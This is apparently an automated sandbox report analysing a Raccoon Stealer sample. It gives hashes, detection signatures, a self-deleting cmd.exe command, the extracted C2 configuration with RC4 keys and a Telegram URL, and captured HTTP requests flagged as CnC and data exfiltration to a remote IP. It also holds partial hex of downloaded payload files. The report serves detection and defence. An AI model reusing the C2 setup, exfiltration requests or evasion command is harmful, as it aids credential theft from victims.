Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.14529.6378

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.14529.6378 (renamed file extension from 6378 to exe)
Analysis ID:	491833
MD5:	e283621cd5dea00d95791a88eecda925
SHA1:	c1fca8da67debe3d9d67cf6def926d81c8bb3350
SHA256:	2becdf23ad63dfcb341ee332fa50623f0cf5e4fa5f0c6c854cd4e59ce8be3ce6
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Machine Learning detection for sample

Self deletion via cmd delete

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Is looking for software installed on the system

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Binary contains a suspicious time stamp

PE file contains more sections than normal

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.AIDetect.malware1.14529.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe' MD5: E283621CD5DEA00D95791A88EECDA925)

cmd.exe (PID: 6212 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5864 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack

Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Virustotal: Detection: 33%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	ReversingLabs: Detection: 37%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040CF54 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040F2E6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040D684 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source:	Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source:	Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49745 -> 185.138.164.150:80
Source: Traffic	Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49745 -> 185.138.164.150:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://t.me/agrybirdsgamerept

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1405Host: 185.138.164.150

Source: Joe Sandbox View

IP Address: 149.154.167.99 149.154.167.99

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:24 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:28 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de 